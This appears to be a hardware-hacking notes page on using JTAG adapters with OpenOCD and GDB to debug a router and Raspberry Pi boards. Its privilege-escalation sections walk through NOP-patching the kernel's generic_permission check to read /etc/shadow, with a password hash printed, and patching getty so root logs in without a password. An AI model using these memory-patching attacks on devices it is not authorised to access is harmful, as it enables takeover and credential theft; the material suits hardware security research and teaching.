JTAG
JTAG (IEEE 1149.1)
Finding the Pins
Pin Info:
- TDI: Serial Test data input of the boundary scan link
- TDO: Serial Test data output of the boundary scan link
- TMS: Test mode select for the state machine
- TCK: Test clock to synchronize state machine operations
- TRST: JTAG Reset for the TAP controller's state machine
Using Shikra
Pinout:
- TCK: 1
- TDI: 2
- TDO: 3
- TMS: 4
- GND: 18
Shikra Config:
>>> cat /usr/share/openocd/scripts/interface/shikra.cfg
#shikra.cfg
adapter driver ftdi
ftdi_vid_pid 0x0403 0x6014
ftdi_layout_init 0x0c08 0x0f1b
adapter speed 2000
#end shikra.cfg
OpenOCD Raspberry Pi 4 config:
# Raspberry Pi 4
telnet_port 4444
gdb_port 3333
transport select jtag
adapter speed 125
jtag_ntrst_delay 500
reset_config trst_only trst_open_drain
gdb_breakpoint_override hard
if { [info exists CHIPNAME] } {
set _CHIPNAME $CHIPNAME
} else {
set _CHIPNAME bcm2711
}
if { [info exists DAP_TAPID] } {
set _DAP_TAPID $DAP_TAPID
} else {
set _DAP_TAPID 0x4ba00477
}
jtag newtap $_CHIPNAME tap -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_DAP_TAPID -enable
dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.tap
set _TARGETNAME $_CHIPNAME.a72
set _CTINAME $_CHIPNAME.cti
set DBGBASE {0x80410000 0x80510000 0x80610000 0x80710000}
set CTIBASE {0x80420000 0x80520000 0x80620000 0x80720000}
set _cores 4
for { set _core 0 } { $_core < $_cores } { incr _core } {
cti create $_CTINAME.$_core -dap $_CHIPNAME.dap -ap-num 0 \
-baseaddr [lindex $CTIBASE $_core]
target create $_TARGETNAME.$_core aarch64 \
-dap $_CHIPNAME.dap -coreid $_core \
-dbgbase [lindex $DBGBASE $_core] -cti $_CTINAME.$_core
$_TARGETNAME.$_core configure -event gdb-attach { halt }
}
# Uncomment below to use SMP
#target smp $_TARGETNAME.0 $_TARGETNAME.1 $_TARGETNAME.2 $_TARGETNAME.3
#targets $_TARGETNAME.0
Use OpenOCD with Shikra:
>>> sudo openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/at91sam7x512.cfg
Open On-Chip Debugger 0.10.0
Licensed under GNU GPL v2
For bug reports, read
http://openocd.org/doc/doxygen/bugs.html
adapter speed: 2000 kHz
srst_only srst_pulls_trst srst_gates_jtag srst_open_drain connect_deassert_srst
Info : auto-selecting first available session transport "jtag". To override use 'transport select <transport>'.
Info : clock speed 2000 kHz
Error: JTAG scan chain interrogation failed: all ones
Error: Check JTAG interface, timings, target power, etc.
Error: Trying to use configured scan chain anyway...
Error: sam7x512.cpu: IR capture error; saw 0x0f not 0x01
Warn : Bypassing JTAG setup events due to errors
Info : Embedded ICE version 15
Error: unknown EmbeddedICE version (comms ctrl: 0xffffffff)
Info : sam7x512.cpu: hardware has 2 breakpoint/watchpoint units
Warn : ThumbEE -- incomplete support
Info : accepting 'telnet' connection on tcp/4444
Using Tigard
Tigard Config:
>>> cat /usr/share/openocd/scripts/interface/tigard.cfg
interface ftdi
ftdi_vid_pid 0x0403 0x6010
ftdi_channel 1
adapter speed 2000
ftdi_layout_init 0x0078 0x017b
ftdi_layout_signal nTRST -ndata 0x0010 -noe 0x0040
ftdi_layout_signal nSRST -ndata 0x0020 -noe 0x0040
transport select jtag
OCD Router Experiment
Running OCD on Router:
>>> openocd -f tigard-jtag.cfg -f mt7620n.cfg
Open On-Chip Debugger 0.11.0
Licensed under GNU GPL v2
For bug reports, read
http://openocd.org/doc/doxygen/bugs.html
jtag
mt7620.cpu
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : clock speed 2000 kHz
Info : JTAG tap: mt7620.cpu tap/device found: 0x1635224f (mfg: 0x127 (MIPS Technologies), part: 0x6352, ver: 0x1)
Info : starting gdb server for mt7620.cpu on 3333
Info : Listening on port 3333 for gdb connections
Connect to OCD on Router:
>>> telnet localhost 4444
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> halt
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
> step
target halted in MIPS32 mode due to single-step, pc: 0x80011094
> reg
===== mips32 registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x1100a401
(3) r3 (/32): 0x00000000
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x01000000
(6) r6 (/32): 0x1100a400
(7) r7 (/32): 0xffff00fe
(8) r8 (/32): 0x802f9fe0
(9) r9 (/32): 0x0000a400
(10) r10 (/32): 0x000f4240
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000035
(13) r13 (/32): 0x777eb3a0
(14) r14 (/32): 0x000003e8
(15) r15 (/32): 0x7789e000
(16) r16 (/32): 0x80300000
(17) r17 (/32): 0x00000001
(18) r18 (/32): 0x802aa744
(19) r19 (/32): 0x00000001
(20) r20 (/32): 0x83fe0000
(21) r21 (/32): 0x00000000
(22) r22 (/32): 0x83fe0000
(23) r23 (/32): 0x00000000
(24) r24 (/32): 0x000003e8
(25) r25 (/32): 0x8001107c
(26) r26 (/32): 0x802f9eb8
(27) r27 (/32): 0x802f9eb8
(28) r28 (/32): 0x802f8000
(29) r29 (/32): 0x802f9eb8
(30) r30 (/32): 0x83fe0000
(31) r31 (/32): 0x80043540
(32) status (/32): 0x1100a401
(33) lo (/32): 0x402da580
(34) hi (/32): 0x00000035
(35) badvaddr (/32): 0x777e3468
(36) cause (/32): 0xd0808000
(37) pc (/32): 0x80043500
(38) f0 (/32): 0x00000000
(39) f1 (/32): 0x00000000
(40) f2 (/32): 0x00000000
(41) f3 (/32): 0x00000000
(42) f4 (/32): 0x00000000
(43) f5 (/32): 0x00000000
(44) f6 (/32): 0x00000000
(45) f7 (/32): 0x00000000
(46) f8 (/32): 0x00000000
(47) f9 (/32): 0x00000000
(48) f10 (/32): 0x00000000
(49) f11 (/32): 0x00000000
(50) f12 (/32): 0x00000000
(51) f13 (/32): 0x00000000
(52) f14 (/32): 0x00000000
(53) f15 (/32): 0x00000000
(54) f16 (/32): 0x00000000
(55) f17 (/32): 0x00000000
(56) f18 (/32): 0x00000000
(57) f19 (/32): 0x00000000
(58) f20 (/32): 0x00000000
(59) f21 (/32): 0x00000000
(60) f22 (/32): 0x00000000
(61) f23 (/32): 0x00000000
(62) f24 (/32): 0x00000000
(63) f25 (/32): 0x00000000
(64) f26 (/32): 0x00000000
(65) f27 (/32): 0x00000000
(66) f28 (/32): 0x00000000
(67) f29 (/32): 0x00000000
(68) f30 (/32): 0x00000000
(69) f31 (/32): 0x00000000
(70) fcsr (/32): 0x00000000
(71) fir (/32): 0x00000000
Read Memory from openocd:
>>> telnet localhost 4444
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> halt
> mem2arrat tcl_varable_name 32 0xd0000000 0x1000
invalid command name "mem2arrat"
> mem2array tcl_varable_name 32 0xd0000000 0x1000
mem2array: Read @ 0xd0000000, w=4, cnt=1024, failed
> mem2array tcl_varable_name 32 0x00000000 0x1000
mem2array: Read @ 0x00000000, w=4, cnt=1024, failed
> mem2array tcl_varable_name 32 0x00000000 0x100
mem2array: Read @ 0x00000000, w=4, cnt=256, failed
> dump_image mydump.bin 0x80000000 0x2000000
GDB Router Experiment
$ gdb-multiarch
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) set architecture mips
The target architecture is set to "mips".
(gdb) target extended-remote localhost:3333
Remote debugging using localhost:3333
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0xff200208 in ?? ()
(gdb) res
(gdb) i r
zero at v0 v1 a0 a1 a2 a3
R0 00000000 00000001 ec4e4000 000000c0 00026cbb 0002ee00 00000000 0000039b
t0 t1 t2 t3 t4 t5 t6 t7
R8 0000002e 676e6974 206e6920 65732033 00000000 777eb3a0 00000000 64692065
s0 s1 s2 s3 s4 s5 s6 s7
R16 00000960 00000001 00000a28 80340000 00000047 80340000 80340000 000003e8
t8 t9 k0 k1 gp sp s8 ra
R24 00000003 8017ff5c 802f9c18 802f9c18 802f8000 802f9c80 83fe0000 8002407c
status lo hi badvaddr cause pc
1100a400 11aa0000 0000039b ff2001fc 50808000 8013e560
fcsr fir
00000000 00000000
(gdb) cont
Continuing.
^C
Program received signal SIGINT, Interrupt.
0x8013e560 in ?? (warning: GDB can't find the start of the function at 0x8013e560.
GDB is unable to find the start of the function at 0x8013e560
and thus can't determine the size of that function's stack frame.
This means that GDB may be unable to access that stack frame, or
the frames below it.
This problem is most likely caused by an invalid program counter or
stack pointer.
However, if you think GDB should simply search farther back
from 0x8013e560 for code which looks like the beginning of a
function, you can increase the range of the search using the `set
heuristic-fence-post' command.
)
(gdb) x/10w $pc
0x8013e560: 343998463 612696063 65011720 0
0x8013e570: 1006796848 -1941722000 1006764038 876776892
0x8013e580: 6422553 4114
(gdb) x/10i $pc
=> 0x8013e560: bnez a0,0x8013e560
0x8013e564: addiu a0,a0,-1
0x8013e568: jr ra
0x8013e56c: nop
0x8013e570: lui v0,0x8030
0x8013e574: lw v1,-21392(v0)
0x8013e578: lui v0,0x6
0x8013e57c: ori v0,v0,0x8dbc
0x8013e580: multu v1,v0
0x8013e584: mflo v0
Privilege Escalation
Finding the Kernel Boot args:
find 0x00000000, 0xffffffff, "console"
Patching Boot Args:
telnet localhost 4444
# Halt the CPU
> halt
# Read the word at the address
> mdw 0x8020dcc8
# Write data to memory
> mww 0x8020dcc8 0xffffffff
# Read it back
> mdw 0x8020dcc8
# Set a watchpoint on the address and resume the CPU
> wp 0x8020dcc8 4; resume
# When the watchpoint triggers, remove it, step once so the pending
# write lands, and show the written data
> rwp 0x8020dcc8; step; mdw 0x8020dcc8
# Write the new boot args to the memory address
> mww 0x8020dcc8 0x324d2031
# Check that they were written correctly
> mdw 0x8020dcc8
# Resume the CPU
> resume
Patching Kernel Memory MIPS
We are patching kernel memory so that the generic_permission function, which checks whether a user has permission to read or write a file, does not return an Access Error. This allows us to operate as root without having the permissions.
Find the generic_permission function:
user@OpenWrt:~$ cat /proc/kallsyms | grep generic_permission
800a8a38 T generic_permission
GDB memory info:
(gdb) x/200i 0x800a8a38
[...]
0x800a8ad4: li v0,-13
0x800a8ad8: andi s2,s2,0x1
0x800a8adc: beqz s2,0x800a8b00
0x800a8ae0: andi v0,v0,0x49
0x800a8ae4: bnez v0,0x800a8b04
0x800a8ae8: move a0,s0
0x800a8aec: li v0,4
[...]
0x800a8b2c: li v0,-13
0x800a8b30: lw ra,36(sp)
0x800a8b34: lw s3,32(sp)
0x800a8b38: lw s2,28(sp)
0x800a8b3c: lw s1,24(sp)
0x800a8b40: lw s0,20(sp)
0x800a8b44: jr ra
Break on the EACCES (-13) load instructions (GDB moves a breakpoint that lands in a MIPS branch delay slot back to the branch itself, which is why the first two addresses are adjusted by 4):
# 0x800a8ad4: li v0,-13
# 0x800a8afc: li v0,-13
# 0x800a8b2c: li v0,-13
(gdb) break *0x800a8ad4
warning: Breakpoint address adjusted from 0xffffffff800a8ad4 to 0xffffffff800a8ad0.
Breakpoint 2 at 0x800a8ad0
(gdb) break *0x800a8afc
warning: Breakpoint address adjusted from 0xffffffff800a8afc to 0xffffffff800a8af8.
Breakpoint 3 at 0x800a8af8
(gdb) break *0x800a8b2c
Breakpoint 4 at 0x800a8b2c
Trigger the EACCES error:
user@OpenWrt:~$ cat /etc/shadow
Modify the generic_permission function Memory:
telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
accepting 'gdb' connection on tcp/3333
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
# 0x00000000 is NOP in MIPS
> mww 0x800a8ad4 0x00000000
> mww 0x800a8b2c 0x00000000
Check with GDB:
(gdb) x/5i 0x800a8ad4
0x800a8ad4: nop
0x800a8ad8: andi s2,s2,0x1
0x800a8adc: beqz s2,0x800a8b00
0x800a8ae0: andi v0,v0,0x49
0x800a8ae4: bnez v0,0x800a8b04
0x800a8ae8: move a0,s0
(gdb) x/5i 0x800a8b2c
0x800a8b2c: nop
0x800a8b30: lw ra,36(sp)
0x800a8b34: lw s3,32(sp)
0x800a8b38: lw s2,28(sp)
0x800a8b3c: lw s1,24(sp)
Patching Kernel Memory ARM
We are patching kernel memory so that the generic_permission function, which checks whether a user has permission to read or write a file, does not return an Access Error. This allows us to operate as root without having the permissions.
Find the generic_permission function:
pi@raspberrypi:~$ sudo cat /proc/kallsyms | grep generic_permission
c0136dd4 T generic_permission
c0712514 R __ksymtab_generic_permission
c071dc94 r __kcrctab_generic_permission
c0729124 r __kstrtab_generic_permission
Use GDB to find the -13:
$ gdb-multiarch
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) set architecture armv7
The target architecture is set to "armv7".
(gdb) target extended-remote localhost:3333
Remote debugging using localhost:3333
(gdb) x/200i 0xc0136dd4
0xc0136dd4: mov r12, sp
0xc0136dd8: push {r3, r4, r5, r6, r7, r8, r11, r12, lr, pc}
0xc0136ddc: sub r11, r12, #4
0xc0136de0: push {lr} ; (str lr, [sp, #-4]!)
0xc0136de4: ldmfd sp!, {lr}
0xc0136de8: mov r3, sp
0xc0136dec: bic r3, r3, #8128 ; 0x1fc0
0xc0136df0: bic r3, r3, #63 ; 0x3f
[...]
0xc0136eb0: mvn r0, #12
0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
Set the Breakpoints:
(gdb) break *0xC0136EB0
Breakpoint 9 at 0xc0136eb0
(gdb) c
Continuing.
Breakpoint 9, 0xc0136eb0 in ?? ()
(gdb) info reg $r0
r0 0x0 0
(gdb) x/10i $pc
=> 0xc0136eb0: mvn r0, #12
0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
0xc0136eb8: mov r0, r5
0xc0136ebc: mov r1, #1
0xc0136ec0: bl 0xc00296f4
0xc0136ec4: cmp r0, #0
0xc0136ec8: bne 0xc0136e28
0xc0136ecc: tst r6, #2
0xc0136ed0: beq 0xc0136e9c
0xc0136ed4: b 0xc0136eb0
(gdb) nexti
0xc0136eb4 in ?? ()
(gdb) x/10i $pc
=> 0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
0xc0136eb8: mov r0, r5
0xc0136ebc: mov r1, #1
0xc0136ec0: bl 0xc00296f4
0xc0136ec4: cmp r0, #0
0xc0136ec8: bne 0xc0136e28
0xc0136ecc: tst r6, #2
0xc0136ed0: beq 0xc0136e9c
0xc0136ed4: b 0xc0136eb0
0xc0136ed8: tst r6, #128 ; 0x80
(gdb) info reg $r0
r0 0xfffffff3 4294967283
(gdb)
Test Register Change:
(gdb) set $r0=0
(gdb) info reg $r0
r0 0x0 0
Trigger the EACCES error:
user@OpenWrt:~$ cat /etc/shadow
Modify the generic_permission function Memory:
telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
accepting 'gdb' connection on tcp/3333
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
# NOP in ARM is 0xe320f000, stored little-endian as the bytes 00 f0 20 e3
# There is a bug with writing more than one byte at a time
> mwb 0xc0136eb0 0x00
> mwb 0xc0136eb1 0xf0
> mwb 0xc0136eb2 0x20
> mwb 0xc0136eb3 0xe3
> mdw 0xc0136eb0
0xc0136eb0: e320f000
Check with GDB:
(gdb) x/10i 0xc0136eb0
0xc0136eb0: nop {0}
0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
0xc0136eb8: mov r0, r5
0xc0136ebc: mov r1, #1
0xc0136ec0: bl 0xc00296f4
0xc0136ec4: cmp r0, #0
0xc0136ec8: bne 0xc0136e28
0xc0136ecc: tst r6, #2
0xc0136ed0: beq 0xc0136e9c
0xc0136ed4: b 0xc0136eb0
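Both the MIPS and the ARM patches above replace a single word of kernel text with the architecture's NOP, and in both cases the only evidence is a word that no longer matches the build. The script below is an added example written for these notes (not the author's tooling) that compares a region dumped with dump_image against a reference copy of the same bytes, reports every differing word and flags the ones that have become a NOP; it also shows the little-endian byte order behind the four mwb writes. The reference and dump byte strings are constructed from the instruction encodings in the disassembly above, not read from a board, and the arch names "mips32" and "arm" are this example's own labels.

```python
"""Compare a JTAG memory dump against a reference copy of the same region and
list every 32-bit word that differs, flagging words that have become the
architecture's NOP encoding.  Added example for these notes, not code from
the page's author; the reference/dump byte strings are constructed from the
instruction encodings shown in the disassembly above, not read from a board."""

import struct

# NOP encodings the notes use when patching, keyed by this example's arch labels.
NOP_ENCODINGS = {
    "mips32": 0x00000000,   # the notes: "0x00000000 is NOP in MIPS"
    "arm":    0xe320f000,   # the notes: mdw reads back e320f000 after the byte writes
}


def words_from_dump(data: bytes, endian: str = "<") -> list:
    """Unpack raw target memory into 32-bit words.  dump_image writes bytes
    exactly as the target stores them, so the word order is the target's
    byte order (little-endian on both boards in these notes)."""
    if len(data) % 4:
        raise ValueError("dump length must be a multiple of 4")
    return list(struct.unpack(f"{endian}{len(data) // 4}I", data))


def bytes_for_word(word: int, endian: str = "<") -> bytes:
    """The byte sequence a target stores for a 32-bit word, i.e. the order in
    which the four mwb writes have to be issued (00 f0 20 e3 for 0xe320f000)."""
    return struct.pack(f"{endian}I", word)


def find_patched_words(base: int, reference: bytes, dump: bytes,
                       arch: str, endian: str = "<") -> list:
    """Return (address, reference_word, dump_word, note) for each differing word."""
    ref = words_from_dump(reference, endian)
    cur = words_from_dump(dump, endian)
    if len(ref) != len(cur):
        raise ValueError("reference and dump cover different sizes")
    findings = []
    for i, (r, c) in enumerate(zip(ref, cur)):
        if r != c:
            note = "replaced with NOP" if c == NOP_ENCODINGS.get(arch) else "modified"
            findings.append((base + 4 * i, r, c, note))
    return findings


def report(findings: list) -> list:
    """Human-readable lines, one per differing word."""
    return [f"0x{addr:08x}: 0x{r:08x} -> 0x{c:08x} ({note})"
            for addr, r, c, note in findings]


# Constructed sample data: encodings of the instructions disassembled above.
MIPS_BASE = 0x800a8ad4
MIPS_REFERENCE = struct.pack("<4I",
    0x2402fff3,   # li v0,-13      (addiu v0,zero,-13; -13 is -EACCES)
    0x32520001,   # andi s2,s2,0x1
    0x12400008,   # beqz s2,0x800a8b00
    0x30420049)   # andi v0,v0,0x49
MIPS_DUMP = struct.pack("<4I", 0x00000000, 0x32520001, 0x12400008, 0x30420049)

ARM_BASE = 0xc0136eb0
ARM_REFERENCE = struct.pack("<2I",
    0xe3e0000c,   # mvn r0, #12    (r0 = ~12 = -13 = -EACCES)
    0xe89da9f8)   # ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
ARM_DUMP = struct.pack("<2I", 0xe320f000, 0xe89da9f8)


if __name__ == "__main__":
    for line in report(find_patched_words(MIPS_BASE, MIPS_REFERENCE, MIPS_DUMP, "mips32")):
        print(line)
    for line in report(find_patched_words(ARM_BASE, ARM_REFERENCE, ARM_DUMP, "arm")):
        print(line)
```

On a real target the reference is the kernel's own text (for example the bytes of vmlinux at the same virtual address) and the dump is the file written by dump_image over the same range; because the comparison is per word at a known base, a single NOP at generic_permission stands out even in a multi-megabyte region.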
Do the Test:
pi@raspberrypi:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
pi@raspberrypi:~$ cat /etc/shadow
root:*:16948:0:99999:7:::
daemon:*:16948:0:99999:7:::
bin:*:16948:0:99999:7:::
sys:*:16948:0:99999:7:::
sync:*:16948:0:99999:7:::
games:*:16948:0:99999:7:::
man:*:16948:0:99999:7:::
lp:*:16948:0:99999:7:::
mail:*:16948:0:99999:7:::
news:*:16948:0:99999:7:::
uucp:*:16948:0:99999:7:::
proxy:*:16948:0:99999:7:::
www-data:*:16948:0:99999:7:::
backup:*:16948:0:99999:7:::
list:*:16948:0:99999:7:::
irc:*:16948:0:99999:7:::
gnats:*:16948:0:99999:7:::
nobody:*:16948:0:99999:7:::
systemd-timesync:*:16948:0:99999:7:::
systemd-network:*:16948:0:99999:7:::
systemd-resolve:*:16948:0:99999:7:::
systemd-bus-proxy:*:16948:0:99999:7:::
pi:$6$X8NLlS0p$2S1FocpEf70CQkDf/fo6DjBo6/2qAQh4hi1ZnaQ8xLZMNEAOf/VAoiuGOspW/v6CpNvJr.SL5m6EM6yPwQIgq/:16948:0:99999:7:::
messagebus:*:16948:0:99999:7:::
avahi:*:16948:0:99999:7:::
ntp:*:16948:0:99999:7:::
sshd:*:16948:0:99999:7:::
statd:*:16948:0:99999:7:::
lightdm:*:16948:0:99999:7:::
pulse:*:16948:0:99999:7:::
rtkit:*:16948:0:99999:7:::
Patching Program Memory ARM
We are patching the getty process to make it run login -f username instead of login -- username. The -f flag is used to skip login authentication. This allows someone with a login prompt to log in without knowing the password.
Find the offsets to the "--" string:
pi@raspberrypi:~$ xxd /sbin/getty | grep "\-\-"
[...]
0006b40: 2d66 0000 2d2d 0000 2573 3a20 6361 6e27 -f..--..%s: can'
Using my Find and Replace Script:
$python ocd_mem_find_replace.py -f "2d66 0000 2d2d 0000" -r "2d66 0000 2d66 0000" -o 0x6b40 -s 0xd0000000
{5: '0x66'}
Starting Scanning Range 0xd0000000 - 0xd1000000
Starting Scanning Range 0xd1000000 - 0xd2000000
Starting Scanning Range 0xd2000000 - 0xd3000000
Starting Scanning Range 0xd3000000 - 0xd4000000
Starting Scanning Range 0xd4000000 - 0xd5000000
Starting Scanning Range 0xd5000000 - 0xd6000000
Starting Scanning Range 0xd6000000 - 0xd7000000
Found Partial Match at 0xd6cf9b40: 0000662d
Found Partial Match at 0xd6cf9b44: 00002d2d
Found Match at 0xd6cf9b40: ['0000662d', '00002d2d']
Paching Address 0xd6cf9b40: 00002d2d -> 2d66 0000 2d66 0000
mwb phys 0xD6CF9B45 0x66
Resuming the Process
Login without Password:
Raspbian GNU/Linux 8 raspberrypi ttyAMA0
raspberrypi login: root
Last login: Sun Jul 24 15:29:32 UTC 2016 on ttyAMA0
Linux raspberrypi 4.4.13+ #894 Mon Jun 13 12:43:26 BST 2016 armv6l
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@raspberrypi:~#
Using Openocd
Finding Number of taps:
>>> sudo openocd -f /usr/share/openocd/scripts/interface/ftdi/tigard-jtag.cfg
Open On-Chip Debugger 0.11.0-rc1+dev-00015-gd4bf20756-dirty (2021-01-13-00:58)
Licensed under GNU GPL v2
For bug reports, read
http://openocd.org/doc/doxygen/bugs.html
jtag
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : clock speed 2000 kHz
Warn : There are no enabled taps. AUTO PROBING MIGHT NOT WORK!!
Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)
Warn : AUTO auto0.tap - use "jtag newtap auto0 tap -irlen 4 -expected-id 0x4ba00477"
Warn : gdb services need one or more targets defined
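The "tap/device found" line above (and the one for the MT7620 router earlier on this page) is OpenOCD decoding the 32-bit IDCODE it shifted out of the chain, and the "all ones" errors in the Shikra run are what the same code path reports when TDO is stuck high. The decoder below is an added example written for these notes, not OpenOCD's code: it splits an IDCODE into its IEEE 1149.1 fields, renders them in OpenOCD's layout, and names the stuck-high, stuck-low and BYPASS cases. The manufacturer-name table is limited to the three JEP106 codes that appear in this page's output (ARM, MIPS and the Xilinx parts from the ftjrev section); any other code is reported as unknown.

```python
"""Decode JTAG IDCODE words the way OpenOCD prints them in its
'tap/device found' line.  This is an added example written for these notes,
not OpenOCD's own code."""

# JEP106 manufacturer names for the codes that appear in this page's
# OpenOCD and ftjrev output; any other code is reported as 'unknown'.
JEP106_NAMES = {
    0x23b: "ARM Ltd",
    0x127: "MIPS Technologies",
    0x049: "Xilinx",
}


def decode_idcode(idcode: int) -> dict:
    """Split a 32-bit IEEE 1149.1 IDCODE into its fields.

    bits 31..28  version
    bits 27..12  part number
    bits 11..1   JEP106 manufacturer id (continuation count in the top 4
                 bits, 7-bit code in the bottom 7)
    bit  0       always 1; a device without an IDCODE register shifts out
                 a single 0 (its BYPASS bit) instead
    """
    if idcode & 1 == 0:
        raise ValueError("bit 0 is 0: BYPASS bit, not an IDCODE")
    mfg = (idcode >> 1) & 0x7ff
    return {
        "version": (idcode >> 28) & 0xf,
        "part": (idcode >> 12) & 0xffff,
        "mfg": mfg,
        "jep106_bank": mfg >> 7,
        "jep106_code": mfg & 0x7f,
        "mfg_name": JEP106_NAMES.get(mfg, "unknown"),
    }


def format_like_openocd(idcode: int) -> str:
    """Render the fields in the layout of OpenOCD's 'tap/device found' message."""
    f = decode_idcode(idcode)
    return (f"0x{idcode:08x} (mfg: 0x{f['mfg']:03x} ({f['mfg_name']}), "
            f"part: 0x{f['part']:04x}, ver: 0x{f['version']:x})")


def diagnose_scan_word(word: int) -> str:
    """Explain the first 32 bits read back from the chain, covering the two
    failure cases OpenOCD reports as well as a healthy IDCODE."""
    if word == 0xffffffff:
        return ("all ones: TDO is stuck high - check the TDO/TCK wiring, "
                "adapter signal levels and target power")
    if word == 0x00000000:
        return "all zeros: TDO is stuck low - check TDO wiring and target power"
    if word & 1 == 0:
        return "first device is in BYPASS (no IDCODE); mfg/part unknown"
    return "idcode " + format_like_openocd(word)


if __name__ == "__main__":
    # The IDCODEs that appear in this page's OpenOCD and ftjrev output.
    for w in (0x4ba00477, 0x1635224f, 0x2295c093, 0x21c2e093, 0xffffffff):
        print(diagnose_scan_word(w))
```

Reading the mfg field as a JEP106 bank and code explains why OpenOCD prints 0x23b for ARM: that is bank 4 (four continuation bytes) plus code 0x3b, not a single eleven-bit manufacturer number.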
Connecting to the Telnet Console:
>>> telnet localhost 4444
Trying ::1...
Connection failed: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> reset halt
Can't assert SRST: nSRST signal is not defined
JTAG scan chain interrogation failed: all ones
Check JTAG interface, timings, target power, etc.
Trying to use configured scan chain anyway...
sam7x512.cpu: IR capture error; saw 0x0f not 0x01
Bypassing JTAG setup events due to errors
Can't assert SRST: nSRST signal is not defined
ThumbEE -- incomplete support
target halted in ThumbEE state due to watchpoint, current mode: System
cpsr: 0xffffffff pc: 0xfffffff9
srst pulls trst - can not reset into halted mode. Issuing halt after reset.
NOTE! DCC downloads have not been enabled, defaulting to slow memory writes. Type 'help dcc'.
NOTE! Severe performance degradation without fast memory access enabled. Type 'help fast'.
> dump_image dump_proxmark3.pin 0x100000 0x100000
dumped 1048576 bytes in 15.351289s (66.704 KiB/s)
> reg
> flash info 0
> flash list
> flash banks
CPU Commands:
# Reset the CPU and halt it immediately
> reset halt
# Show registers
> reg
# Reset the CPU and let it run
> reset run
Memory Commands:
# Get flash memory information
> flash info 0
> flash list
> flash banks
# Dump memory to a file
> dump_image raspi_kern_c0.bin 0xc0000000 0x01000000
# Erase the flash bank and write an image to it
> flash write_image erase "Desktop/FirstApp.hex"
Using ftjrev
Scanning for Clocks:
$ ./ftjrev clocks
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Scanning for Devices:
$ ./ftjrev scan
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
